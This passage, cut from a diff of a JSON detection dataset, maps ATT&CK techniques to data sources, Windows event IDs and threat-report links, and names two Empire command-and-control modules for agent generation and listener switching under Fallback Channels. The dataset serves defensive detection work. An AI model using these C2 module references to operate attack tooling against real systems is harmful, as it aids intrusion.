to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://www.justice.gov/file/1080281/download", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1008", + "command_list": [ + "powershell/management/switch_listener", + "external/generate_agent" + ], + "commands": [ + { + "command": "powershell/management/switch_listener", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "external/generate_agent", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/management/switch_listener", + "ATT&CK Technique #1": "T1008", + "ATT&CK Technique #2": "", + "Technique": "Fallback Channels", + "Concatenate for Python Dictionary": "\"powershell/management/switch_listener\": [\"T1008\"]," + }, + { + "Empire Module": "external/generate_agent", + "ATT&CK Technique #1": "T1008", + "ATT&CK Technique #2": "", + "Technique": "Fallback Channels", + "Concatenate for Python Dictionary": "\"external/generate_agent\": [\"T1008\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Malware reverse engineering" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Packet capture" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Malware reverse engineering" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Packet capture" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as 